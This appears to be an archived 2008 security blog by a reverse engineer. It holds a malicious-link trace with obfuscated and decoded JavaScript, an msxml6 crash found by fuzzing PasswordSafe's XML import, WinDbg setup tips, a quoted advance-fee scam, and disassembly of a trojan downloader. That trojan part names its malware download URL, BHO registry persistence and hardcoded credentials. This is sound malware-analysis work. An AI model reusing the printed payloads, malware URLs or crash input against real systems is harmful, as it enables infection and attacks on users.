MSN Spreaded Malicious Website

May 25, 2008

Hi,

WARNING!!!!!

This post contains Malware linked URLs so pay attention, don’t game with these links!!!

Idiots Proof End

Hi,

Today moring I’ve received a link from an MSN Contact of mine, she was offline.

Code:
hxxp://checkdiz.info

at first analysis with Malzilla it reveals three other links

Code:
hxxp://checkdiz.info/indexx.php
hxxp://www.cpashield.com/abuse.html

hxxp://checkdiz.info/counter.php

indexx.php has a level of indirection to

Code:
hxxp://fileho5t.info/indexxx.php

counter.php leads to

Code:
hxxp://www.ipcounter.de/stats.php?u=50076309

and finally the most intersting cpashield.com/abuse.html contains obfuscated javascript code

Code:
<!--
jL0="0ucoc\\MIM",yU90="Iu\{\{\{\%\%ovf0N";0.1261199,nB73="0.7082915",yU90='\|\:T2B\ m\
(8\?\$\*b\]AyX\"aOVt\.Y\-\_1qx\\\{\[l\niZI4\r3\=\!7uHv5JsCKPj\;QgR\+\`foM6w\/F\>\'rpN\<D9\^S\,
\@\#dcWU\}\%LE\&nG0\~ekzh\)',jL0='\"u\>tc\`S\ \]I\_\&\{gholKDf\#LdkCXU\~\/z97y\'m\,\\8B\=\rRG\
|\.iE\+n\n\%FJ\;1b\[saV\-36\)Aw\$O\(\!H2MNZ\*eqvPW4r\@T5\:Y\<Qx0\^pj\}\?';function lW4(uO49){"
0u\%N\{\{I\{\\",l=uO49.length;'0k\+IBI\r0c',w='';while(l--)"0ucooc\;\{\{",o=jL0.indexOf(uO49.
charAt(l)),'\~k\)0\~cc\+YX0c',w=(o==-1?uO49.charAt(l):yU90.charAt(o))+w;"0uoN0M\%\{\{",jL0=jL0.
substring(1)+jL0.charAt(0),document.write(w);'0kZ\r\)Z\r\r\|'};lW4("2nW\(m\!L\`yD\<b\|Db\^\rJDi
DnW\(m\!L\$\)l8t\r8\]\]U\;mV\ P\-W\|S\^\<LdDyy\?9V\|\<WLm\-\<\`XPS\ \?9\(\^L\|\(\<\`VDyn\^\@\;V
\|\<WLm\-\<\`XSPS\ \?9P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\rXPS\;n\^L\>mS\^\-\|L\ KXSPS\ \?Ke\]x
x\?\@\;XSPS\ \?\;\@P\-W\|S\^\<Ld\-\<W\-\<L\^\/LS\^\<\|\r\<\^\)\`w\|\<WLm\-\<\ K\(\^L\|\(\<\`VDy
n\^K\?\;V\|\<WLm\-\<\`X\<PS\ \^\?9mV\ P\-W\|S\^\<LdyDo\^\(n\"\"\)m\<P\-\)dnmP\^\{D\(\?9mV\ \^d\
)\}mW\}R\rU\?\(\^L\|\(\<\`VDyn\^\;\@\@\;mV\ P\-W\|S\^\<LdyDo\^\(n\?9P\-W\|S\^\<LdWD\!L\|\(\^\:i
\^\<Ln\ \:i\^\<Ld3fr\*\:Mf4H\?\;P\-W\|S\^\<Ld\-\<S\-\|n\^P\-\)\<\rX\<PS\;\@\^yn\^9P\-W\|S\^\<Ld
\-\<S\-\|n\^\|\!\rX\<PS\;\@\;S1Ux\rtEN\=\;\{fGE\r6EN8\;V\|\<WLm\-\<\`XP\)n\ \?9\)m\<P\-\)dnLDL\
|n\`\r\`K\`K\;n\^L\>mS\^\-\|L\ KXP\)n\ \?KeUxx\?\;\@\;XP\)n\ \?\;mM\]N\r6xtU\;m48E\r\=8E8\;V\|\
<WLm\-\<\`XPPn\ \?9mV\ P\-W\|S\^\<LdDyy\?9P\-W\|S\^\<Ld\-\<n\^y\^WLnLD\(L\rV\|\<WLm\-\<\`\ \?9\
(\^L\|\(\<\`VDyn\^\@\;n\^L\>mS\^\-\|L\ KXPPn\ \?KeGxx\?\@\@\;XPPn\ \?\;b\+E\r8ENG\;mHUG\rNG\=G\
;jltt\rtEN6\;yMGx\r\=G\=6\;p1tN\r8\]G\]\;jfN8\r\]\]\]x\;\~kx\rUG\=\]\;\;XymW\^\<n\^PXL\-X\rKF\^
L\^\(\`\nDyyK\;2AnW\(m\!L\$")//-->

Which decoded became

Code:
wX42=4881;
if(document.all){
function _dm(){return false};
function _mdm(){
document.oncontextmenu=_dm;
setTimeout("_mdm()",800)};
_mdm();
}
document.oncontextmenu=new Function("return false");
function _ndm(e){
if(document.layers||window.sidebar){if(e.which!=1)return false;
 }
};
if(document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=_ndm;
 }
else {
document.onmouseup=_ndm;
};
mQ10=2593;bO75=6594;
function _dws(){
window.status = " ";
setTimeout("_dws()",100);
};
_dws();
iD89=6021;
iW45=3454;
function _dds(){if(document.all){
document.onselectstart=function (){return false};
setTimeout("_dds()",700)}};_dds();
gJ5=4597;
iN17=9737;
zX22=2596;
lD70=3736;
kQ29=4878;
zO94=8880;
qY0=1738;
;_licensed_to_="Peter Call";

there is also another piece of obfuscated code

Code:
<script language="javascript">lW4("MGN\#\%tCJYS\?d\ \'SJ\@\`\:8\%SDXwwr\r\%wwNtNSKit6\:S\~k0St
\!fQ\n\,d\,3Qf\'wwY2DSD\?ddH\>wwAAAkA\rk3\!\[wtswz\?d\ \'\~wNtNwz\?d\ \'\~Xd\!fQ\n\,d\,3Qf\'kWd
WDO\=m\=mMGXXS\%\!pfdpWS3QSoH\!Sc\+qSc00\|SI\>c0\>0cSJ6SXXO\=m\=mM\?d\ \'O\=mSSSM\?pfWO\=mSSSSS
SMd\,d\'pO\=mSSSSSSSSS\=mSSSSSSMwd\,d\'pO\=mSSSSSSM\ pdfSQf\ pRDxY2Ysot\#sDS43QdpQdRDo\!f4\?Q3H\
?\,\'\,fS\+k\rDwO\=mSSSSSSM\ pdfSQf\ pRD\$\#s6ottYsDS43QdpQdRDo\!f4\?Q3H\?\,\'\,fS\+k\rDwO\=mSS
SMw\?pfWO\=m\=mSSSMg3WlSg\[43\'3\!RDP\-\-\-\-\-\-DSdpzdRDP000000DS\'\,QjRDP0000\-\-DSE\'\,QjRDP
I000I0DSf\'\,QjRDP\-\-0000DO\=m\=mSM4pQdp\!OMgOJ\'pf\npS\!pH3\!dSfQlS\np\!E\,4pSE\,3\'fd\,3Q\nS
d3\>SMoS\?\!p\-RD\ f\,\'d3\>fg\.\npv4Hf\n\?\,p\'Wk43\ DOfg\.\npv4Hf\n\?\,p\'Wk43\ MwgOMwfOMw4pQ
dp\!O\=m\=mSSSMwg3WlO\=mMw\?d\ \'O\=m")

Pay attention, this kind of accessing system could lead to severe Privacy Compromisal, it acts as Spam and could work as Data Miner.

See you to the next post.. :)


MSXML6 Microsoft Core XML Services Bug Discovered

May 24, 2008

Hi,

Yesterday I was researching the presence of bugs into PasswordSafe3.13 and one of the tests was directed to the Import XML Option, so I produced a large malformed XML File (about 12 MBytes of repetitions). The applicaton crashed. Apparently could appear as a bug of PasswordSafe, but when you’re dealing with XML it’s fundamental to inspect accurately what component faulted, cause the first possible reason is the XML Parser Component (as in our case).

First operation is to fire up windbg as Post-Mortem debugger suddenly after clicking import it popups but is unable to catch handle the occurred exception (e0000001) so proprietary handler silently drops the process, and no stack informations come out.

Let’s set a breakpoint on exception sxe e0000001 and import the XML Malicious file..

WinDbg suddenly pops out, our exception happened and execution is now blocked into RaiseException procedure.. The Faulted Application is now known! msxml6.dll that is the Microsoft Core of XML Services. In the past msxml6 suffered of various bugs correlated to its parsing functionalities , so if you want to make some experiment be sure of the dll version that you have.

Latest patches and upgrades can be downloaded here

Cooming back to windbg here is the result of the Exception Analysis:

EXCEPTION_RECORD: ffffffff — (.exr 0xffffffffffffffff)
ExceptionAddress: 7c81eb33 (kernel32!RaiseException+0x00000053)
ExceptionCode: e0000001
ExceptionFlags: 00000000
NumberParameters: 1
Parameter[0]: 80004005

FAULTING_THREAD: 000007c0
BUGCHECK_STR: e0000001
DEFAULT_BUCKET_ID: APPLICATION_FAULT
PROCESS_NAME: image00400000
ERROR_CODE: (NTSTATUS) 0xe0000001 – <Unable to get error code text>
NTGLOBALFLAG: 70
APPLICATION_VERIFIER_FLAGS: 0
LAST_CONTROL_TRANSFER: from 5888d5af to 7c81eb33

STACK_TEXT:
0012e0e8 5888d5af e0000001 00000000 00000001 kernel32!RaiseException+0x53
0012e108 5888176b 80004005 00000000 0161c228 msxml6!Exception::raiseException+0x5f
0012e17c 588c5b07 016e2440 0161c294 00000000 msxml6!SchemaValidator::startElement+0x46e
0012e24c 5882ca04 0161c228 5882d7f4 00000000 msxml6!SAXSchemaProxy::startElement+0x1db
0012e2b4 5882d407 5882d7f4 00000000 01605fe0 msxml6!Reader::ParseElementN+0x124
0012e2c4 5882d312 5882d7f4 5882d7f4 01605fe0 msxml6!Reader::ParseDocument+0x9c
0012e2fc 5882d1bf ffffffff 01605fe0 00000000 msxml6!Reader::Parse+0x93
0012e36c 5883d67f 01605fe0 0012e43c ffffffff msxml6!Reader::parseURL+0x12e
0012e3ac 004a8921 01605fe0 0012e43c 3ff5c5a7 msxml6!SAXReader::parseURL+0x6e
WARNING: Stack unwind information not available. Following frames may be wrong.
0012e3b8 3ff5c5a7 0012e748 0055532c 0012e758 image00400000+0xa8921
0012e43c 0070005c 00730077 00660061 00650065 0x3ff5c5a7
0012e440 00730077 00660061 00650065 002e0065 0x70005c
0012e444 00660061 00650065 002e0065 006d0078 0x730077
0012e448 00650065 002e0065 006d0078 0000006c 0x660061
0012e44c 002e0065 006d0078 0000006c 00000000 0x650065 <- Suspicious
0012e450 006d0078 0000006c 00000000 00000000 0x2e0065 <- Suspicious
0012e454 00000000 00000000 00000000 00000000 0x6d0078 <- Suspicious

FOLLOWUP_IP:
msxml6!Exception::raiseException+5f
5888d5af 5f pop edi

SYMBOL_STACK_INDEX: 1
SYMBOL_NAME: msxml6!Exception::raiseException+5f
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: msxml6
IMAGE_NAME: msxml6.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 454d0ec6
BUCKET_ID: e0000001_msxml6!Exception::raiseException+5f
FAILURE_BUCKET_ID: msxml6.dll!Exception::raiseException_e0000001_APPLICATION_FAULT
Followup: MachineOwner

Here the Xml to cause the crash:

<?xml version=”1.0″ encoding=”UTF-8″?>
<?xml-stylesheet type=”text/xsl” href=”pwsafe.xsl”?>
<paaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa {10/11 MB of Repetitions} aaaaaaaaaaaaaaasswordsafe
delimiter=”»”
Database=”C:\xxxxx.psafe3″
ExportTimeStamp=”2008-05-21T11:31:20″
FromDatabaseFormat=”3.04″
WhoSaved=”xxxxxxxxxxx”
WhatSaved=”Password Safe V3.13″
WhenLastSaved=”2008-05-21T11:28:08″
Database_uuid=”a079e304-75d7-4dd2-9a8a-9568ece18b08″

xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance&#8221;

xsi:noNamespaceSchemaLocation=”pwsafe.xsd”>

</passwordsafe>

It’s all for now, may be that I’ll publish a more deep analysis of that Bug

See you to the next post.. :)

Giuseppe ‘Evilcry’ Bonfa’


Disabling VS JIT and Prepairing WinDBG for Unknown Exceptions

May 22, 2008

Hi,

Often when you’re working on bug hunting, VS’s JIT Debugger became totally unusable cause it hasn’t a refined mechanism of exception inspection and no great aids for Post-Mortem Debugging, so became necessary to switch to the actual Lord of Debuggers..WinDbg (obviously after Sacred SoftICE :))so let’s disable the VS JIT that in case of crash will acts as the Handler of the occured Unhandled Exception.

Open VS Tools->Options->Debugging -> Just-In-Time Debugging and disable Native, Managed and Script

Now every application that crashes has not a debugger that handles the exception, let’s actualize WinDbg as JIT Debugger.

Go into WinDbg directory (Debugging Tools for Windows) and type

windbg -I

Now if all is ok a success MessageBox shoud appear.

Now try to cause an unhandled exception, for example by calling a buggy application, if Windbg popups it means that all works fine.

Now could happen that the unhandled exception is Unknown and windbg breaks when the execution is finished so we don’t have great information, no exception informations of reg/stack infos, but is here the power of windbg we can set Event Filters for all kind of exceptions known or not.

For example Unknown exception – code e0000001 (first chance)

We can put directly a break point when this unknown exception happens! :)

by typing:

>sxe e0000001

>g

To remove breakpoint type:

>sxd e0000001

See you to the next post.. :)


Social Engineering E-Mail Fraud

May 19, 2008

Hello,

It’s funny how some old techniques Social Engineering Frauds are still in use..

Yesterday evening I’ve received an e-mail from Rev. Father Jones Harth

Subject: Peace Be With You / View the Attached Document

Content:

I am Rev. Father Jones Harth, from the United Kingdom and I wish to inform you that you are a blessed person, which your fund is ready to be paid to you once you have done all necessary paper works.

For more directives regards to this payment, kindly view a copy of the attached document and get back to me as soon as possible.

Regards,
Rev. Father Jones Harth

In attachment there was a doc let’s see it..

THE UNITED NATIONS ORGANISATION
IN CONJUNCTION WITH THE INTERNATIONAL MONETARY FUND
WORLD BANK FACT-FINDING & SPECIAL DUTIES OFFICE
LONDON, UNITED KINGDOM.
Email:

Greetings to you,

I am Rev. Rev. Father Jones Harth, a senior staff with the World Bank fact finding & special duties office. I am writing you this letter because cool penny is better than millions of dollars. It is better for one to live and die poor honest man than a rich dishonest one. I and the chief security officer (CSO) of this organization have arranged with an officer in computer section engineer Peter Cliff to bring out part of your total pending payment sum amounting to US$10 million. Why we did this is because according to information gathered from the banks/security computer, you have been waiting for a long time to receive your money without success. As I found out that you have almost met all the statutory requirements in respect of your pending payment, your problem is that of interest groups.

A lot of people are interested in your payment and those people are merely doing paper works with you and that explains why you receive fax and phone messages from different people everyday. Also we found out that some of the officials of the parastatals have been extorting a lot of money from you with the pretext of helping you receive your money. I can assure you that this may last for years yet nothing happens if you do not do away with those officers that you call your partners. And for security reasons do not tell anybody that you have your money until you receive cash at your door step.

The money is in a security-proof box weighing 75kg. Yesterday we went to four courier companies to make arrangements on how to ship them by courier to you. Dhl, Ems, FedEx, Ups all said that they must open the boxes for inspection by the customs before shipment. This is something we want to avoid because the box is padded with synthetic nylon and to open it, you have to cut the pad before you will meet the button that you will press to open the dial code-lock. There is no way you can open the box and be able to close it again because it was padded with machine. We told the courier services that the box contained film materials and when open will spoil the materials. We did not declare money because courier does not carry money. Today a friend of mine who is diplomat disclosed to me that there is a security courier service they use to send diplomatic materials and information from one country to another. It has diplomatic immunity and consignment cannot be checked by any customs anywhere in the world. I have met the officials of the security courier service and concluded shipping arrangement with them, which they will commence as soon as i have your go ahead order.

The diplomat will help me so we do not have any problem. We have concluded that you must donate Five Hundred Thousand United States dollars (US$500,000.00) to any charity organisation I designate as soon as you receive your money. To this effect, you will send us a promissory note for Five Hundred Thousand United States dollars (US$500,000.00) along with your address for sending the box by courier. Please maintain topmost secrecy as it may cause a lot of problems if found out that we are using this way to help you. Do not ever tell anybody about this until you have your money. I want to help you because something in me is telling me that you are an honest person. When you conclude this and you send our promise, we will help to ship the final part of your money to you.

God be with us as we wait for your reply on email address:

Yours faithfully,
Rev. Rev. Father Jones Harth

eheh a funny one eh? :)

So I replied with this little mail to see if someone replies:

Hi,

Yeah thanks, what I’ve to do?

Regards,
Giangreco Vafanculo Demente

..and “surprise” fast reply from Reverend…

GREETINGS TO YOU IN THE NAME OF GOD.

I THANK YOU FOR YOUR EMAIL RESPONSE AND UNDERSTANDING. I HAVE BEEN MAKING ALL NECESSARY ARRANGEMENT TO MAKE SURE THAT I OBTAIN THE CONSIGNMENT IMMUNITY DOCUMENTS IN YOUR FULL NAMES AND CONTACT ADDRESS WHICH I WANT YOU TO FURNISH THIS HONORABLE OFFICE.

THIS WILL PROVE BEYOND EVERY DOUBT THAT THE CONSIGNMENT BELONGS TO YOU AND ALSO PROTECT THE CONSIGNMENT FROM BEING VANDALIZED OR CHECKED BY CUSTOMS ANYWHERE IN THE WORLD.

I HAVE CONCLUDED THIS ARRANGEMENT WITH THE DIPLOMATIC COURIER COMPANY THAT IS RESPONSIBLE FOR THE SHIPMENT OF THE CONSIGNMENT TO YOUR ADDRESS WILL BE HERE TO EVACUATE THE CONSIGNMENT TO THEIR OFFICE FOR WEIGHING EXERCISE AND DIPLOMATIC PACKAGING.

THE SHIPMENT COMPANY REQUIRES YOU TO SEND CORRECTLY YOUR SAFE DELIVERY ADDRESS TO AVOID SHIPMENT TO A WRONG ADDRESS, SEND A COPY OF YOUR IDENTIFICATION (DRIVER’S LICENSE OR INTERNATIONAL PASSPORT) FOR IDENTIFICATION PURPOSE AT THE POINT OF DELIVERY AND PROVIDE YOUR PRIVATE TELEPHONE AND FAX NUMBER IF ANY.

PLEASE BEAR IN MIND THAT YOU ARE REQUIRED TO PROVIDE THE ABOVE AS QUICKLY AS POSSIBLE TO ENABLE THEM PREPARE THE AIRWAY BILL AND SHIPMENT SCHEDULE.

I PRAY THE ALMIGHTY GOD WILL GUIDE YOU ACCORDINGLY AS I AWAIT FOR YOUR RESPONSE. YOU CAN CALL ME ON MY DIRECT TELEPHONE NUMBER AT ANY TIME ROUND THE CLOCK ON {{CENSORED}}

I WILL BE EXPECTING YOUR CALL AS SOON AS YOU RECEIVE THIS EMAIL OR YOU CAN EMAIL ME BACK.

NB: NOTE THAT YOU HAVE TO SEND YOUR FULL NAMES, CONTACT ADDRESS AND TELEPHONE NUMBERS, WHICH I WILL TAKE IT TO THE SECURITY COURIER COMPANY IN ORDER TO USE IT TO STATE YOU AS THE OWNER OF THE BOX.
GOD BLESS YOU.
REV. Rev. Father Jones Harth
Laugh laugh laugh!!! :D
See you to the next post.. :)

Downloader.Win32.Small OR Win32/PolyCrypt Reversing

May 16, 2008

Hi,

come back with the Reverse Engineering of Trojan-Downloader.Win32.Small, and msstub.dll actually reported as malware but not well documented.


Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry@gmail.com
Website: http://evilcry.altervista.org

                                      Introduction

MD5 Hash Signature: 5f9e38abd1c20ba44ff07903489bac10
Identification: AVG Antivirus -> Win32/PolyCrypt
                Kaspersky -> Trojan-Downloader.Win32.Small.ihj

Format: EXE and Embedded DLLs

                                         The Essay

PolyCrypt is spreaded through infected Websites by using Exploits or every other form of abusive
Download mechanism. PolyCrypt is weakly Packer Protected, so with VMUnpack we can suddenly obtain
the full working unpacked copy.

Let's trace from the EP:

00401000     mov     eax, 104h
00401005     mov     edx, offset dword_403033
0040100A     push    eax
0040100B     inc     ecx
0040100C     push    edx
0040100D     push    offset loc_4013BE ;points to jmp GetSystemDirectoryA
00401012     call    sub_4012BD ;Call GetSystemDirectoryA

PolyCrypt uses an basilar method for API call, just to deceit basical fast analysis, the  call
sub_4012BD access directly the jump table at the entry passed as parameter.

0040101B   push    offset aMsstub_dll ; "\\msstub.dll"
00401020   push    offset dword_403033 ;System Directory
00401025   push    offset loc_4013E2
0040102A   call    sub_4012BD         ;lstrcat
0040102F   pop     dword_402027
00401035   pop     ebx
00401036   push    ebx
00401037   push    80h
0040103C   push    2
0040103E   push    ebx
0040103F   push    1
00401041   push    40000000h
00401046   push    offset dword_403033 ;Full Path
0040104B   push    offset CreateFileA
00401050   call    sub_4012BD
00401060   mov     edx, esp
00401062   push    ebx
00401063   push    edx
00401064   push    1000h
00401069   push    offset dword_402027
0040106E   push    dword_403027
00401074   push    offset WriteFile
00401079   call    sub_4012BD
0040107E   pop     ecx
0040107F   push    dword_403027

00401085   push    offset CloseHandle
0040108A   call    sub_4012BD

This piece of code builds the a string path c:\windows\system32\msstub.dll and next creates this
DLL (msstub.dll) and fills if it with embedded data.

0040108F    push    offset aDb5825eaB434C6 ; "{DB5825EA-B434-C69E-8E2D-81387140521A}"
00401094    push    offset aClsid   ; "CLSID\\"
00401099    push    offset byte_403137
0040109E    push    offset wsprintfA
004010A3    call    sub_4012BD
004010A8    add     esp, 0Ch
004010AB    push    eax
004010AC    push    esp
004010AD    push    offset dword_40302F
004010B2    push    ebx
004010B3    push    3
004010B5    push    0
004010B7    push    ebx
004010B8    push    ebx
004010B9    push    offset byte_403137 ; “CLSID\\{DB5825EA..”
004010BE    push    80000000h
004010C3    push    offset RegCreateKeyExA

To overcome basical detecting attemps it's used the CLSID Splitting, the complete string is
CLSID\\{DB5825EA-B434-C69E-8E2D-81387140521A}, obviously next operation is to create this Registry
Key Entry.

004010D6    push    eax
004010D7    push    esp
004010D8    push    offset dword_40302B
004010DD    push    ebx
004010DE    push    2
004010E0    push    0
004010E2    push    ebx
004010E3    push    ebx
004010E4    push    offset aInprocserver32 ; "InprocServer32"
004010E9    push    dword_40302F
004010EF    push    offset RegCreateKeyExA
00401111    inc     eax
00401112    push    eax
00401113    push    offset aApartment ; "Apartment"
00401118    push    1
0040111A    push    ebx
0040111B    push    offset aThreadingmodel ; "ThreadingModel"
00401120    push    dword_40302B
00401126    push    offset RegSetValueExA
0040112B    call    sub_4012BD
0040113A    inc     eax
0040113B    push    eax
0040113C    push    offset dword_403033
00401141    push    1
00401143    push    ebx
00401144    push    ebx
00401145    push    dword_40302B
0040114B    call    RegSetValueExA
00401150    push    dword_40302B
00401156    call    RegCloseKey

This piece of code creates into the previously builded CLSID the following entry:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\
{CLSID}\InprocServer32 = iexplorer.exe
\ThreadingModel = Apartment (which is single threaded)

In other words Registers a 32-bit in-process server and specifies the threading model of the
apartment the server can run in, in our case the InprocServer32 is Internet Explorer.
So the malicious dll (msstub.dll) could be called by IE, indeed the next operation accomplished
by PolyCrypt is to Open IE with ShellExecuteA(), finally builds a  .bat script file, called
dmfg.bat to delete the Executable..

PolyCrypt is completly Reversed, let's see now what happens into msstub.dll

=> msstub.dll

The first fast way to analyze this dll is with LoadDll.exe of OllyDbg, but during the analysis is
important to change some conditional jump that checks if the dll was called by IE.

003567C1   MOV AL,BYTE PTR DS:[EDI] ;EDI is the raw address table
003567C3   INC EDI
003567C4   OR AL,AL
003567C6   JE SHORT msstub.003567A4
003567C8   MOV ECX,EDI
003567CA   PUSH EDI     ;HeapAlloc
003567CB   DEC EAX
003567CC   REPNE SCAS BYTE PTR ES:[EDI]
003567CE   PUSH EBP
003567CF   CALL DWORD PTR DS:[ESI+6068] ;GetProcAddress("HeapAlloc")
003567D5   OR EAX,EAX
003567D7   JE SHORT msstub.003567E0    ;Address == NULL Jump Out
003567D9   MOV DWORD PTR DS:[EBX],EAX  ;EBX is the address function table
003567DB   ADD EBX,4                   ;next address
003567DE   JMP SHORT msstub.003567C1 

This piece of code builds an Address Function Table, this is a method of indirect API Importing,
just to make a bit harder Disasm Analysis, here a list of Imported APIs:

HeapAlloc, GetCurrentProcessId, HeapFree, DeleteFileA, 
HeapCreate, GetLastError, CreateEvent, HeapRealloc, GetTempPathA, 
GetVersion, GlobalAlloc, ExitProcess, CreateFile, HeapDestroy,
CreateThread, CloseHandle, HeapSize, GetModuleFilename, LoadLibrary,
Sleep, VirtualFree, WriteFile, lstrcat, lstrcmp, lstrcpy, GlobalFree,
wsprintf, InternetCloseHandle, HttpSendRequest, HttpQueryInfoA. 
HttpOpenRequest, InternetSetOption, TnternetReadFile, 
InternetQueryDataAvailable InternetOpenA, InternetBadConnectionState, InternetCrackUrlA,
InternetConnectA.

It's important to say that this little dll works entirely with the Heap Memory,
everithing is runtime decrypted and pushed into heap.

After a decryption routine we obtain some intersting strings:

http://redmed.ru/images/stories/Sport002/fiax.php

cvesw.dll

CLSID\{DB500391040  825EA-B434-C69E-8E2D-81387140521A}

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\

\InprocServer32

Cause is a Downloader, it's easy to understand that the URL contains malicious code that will be
used to build csesw.dll and finally acts in the same way that was used to load msstub.dll, by
creating a CLSID Registry Key entry (CLSID\{DB500391040  825EA-B434-C69E-8E2D-81387140521A}) with
an InprocServer32 procedure..

As should be clear by analysing deadly this dll no traces of these operations could be founded,
so let's move to a debug approach.

The core algorithm of the Downloader is obtained by the decryption of a portion of data that is
pushed into Heap, so execution flows in the Heap..cause the code is long I've reported only the
significants pieces of code..

00390030   MOV ECX,390581         ; JMP to kernel32.GetModuleFileNameA
0039003    CALL 00390115          ; GetModuleFileNameA
..
00390045   PUSH EAX
00390046   PUSH 390108            ; ASCII "iexplore.exe"
0039004B   MOV ECX,3905A5         ; JMP to kernel32.lstrcmpiA
00390050   CALL 00390115
..
00390055   TEST EAX,EAX
00390057   JNZ SHORT 003900C1    ;Jump out
00390059   PUSH 104
0039005E   PUSH 3912E3
00390063   PUSH DWORD PTR SS:[EBP+8]
00390066   CALL 00390581          ; JMP to kernel32.GetModuleFileNameA
0039006B   MOV ECX,390521         ; JMP to kernel32.GetCurrentProcessId
00390070   CALL 00390115
00390075   PUSH EAX
00390076   PUSH 3910CD            ; ASCII "ntdfgz_%u" ;ntdfgz_PID
..
003900A8   JE SHORT 003900C8
003900AA   PUSH EBX
003900AB   PUSH ESP
003900AC   PUSH EBX
003900AD   PUSH EBX
003900AE   PUSH 39011C           ;Thread Procedure
003900B3   PUSH EBX
003900B4   PUSH EBX
003900B5   CALL 0039056F         ; JMP to kernel32.CreateThread

If the dll is not loaded through IE, execution is aborted, else is opened a new thread procedure at
address 0039011C, which is the Downloader releated part..

00390144  PUSH DWORD PTR SS:[EBP-4]
00390147  PUSH 391000   ; "http://redmed.ru/images/stories/Sport002/fiax.php"
0039014C  CALL 003902FE ;Connect and Download

Let's see this call

003902FE   PUSH EBP
003902FF   MOV EBP,ESP
00390301   SUB ESP,54
..
0039033B   CALL 003905F3  ; InternetGetConnectedState
00390340   POP EDX
00390341   TEST EAX,EAX
00390343   JE 00390509 ; If there is no connection go out
00390379   PUSH EDI
0039037A   PUSH EBX
0039037B   PUSH EBX
0039037C   PUSH DWORD PTR SS:[EBP+8]
0039037F   PUSH 3905F9      ; JMP to WININET.InternetCrackUrlA
00390384   CALL 00390117

Cracks the URL format in its components that will be used by the other internet functions.

00390393   PUSH EBX
00390394   PUSH 0
00390396   PUSH EBX
00390397   CALL 003905ED            ; JMP to WININET.InternetOpenA
..
0039039F   PUSH 3
003903A1   PUSH DWORD PTR SS:[EBP-10]  ;Password
003903A4   PUSH DWORD PTR SS:[EBP-C]   ;User
003903A7   PUSH DWORD PTR DS:[EDI+18]
003903AA   PUSH DWORD PTR SS:[EBP-4]
003903AD   PUSH EAX
003903AE   PUSH 3905FF              ; JMP to WININET.InternetConnectA
003903B3   CALL 00390117
..
003903D4   PUSH EBX
003903D5   PUSH DWORD PTR SS:[EBP-8]
003903D8   PUSH EBX
003903D9   PUSH EAX
003903DA   CALL 003905D5             ; JMP to WININET.HttpOpenRequestA

Easy to understand, dll attempts a connection to redmed, by accessing a php page protected with
User and Password authentication. 
"Credentials" can be stolen easly by watching the 4th and 5th parameters of InternetConnectA.

User: BADF000h
Password: BADF000h

After login, a loop procedure with InternetReadFile downloads the content of cvesw.dll.

Unfortunately this last link is closed, so csesw.dll can't be retrived, but now msstub.dll is
fully documented ;)

Regards,
Giuseppe 'Evilcry' Bonfa'

See you to the next post.. :)

Follow

Get every new post delivered to your Inbox.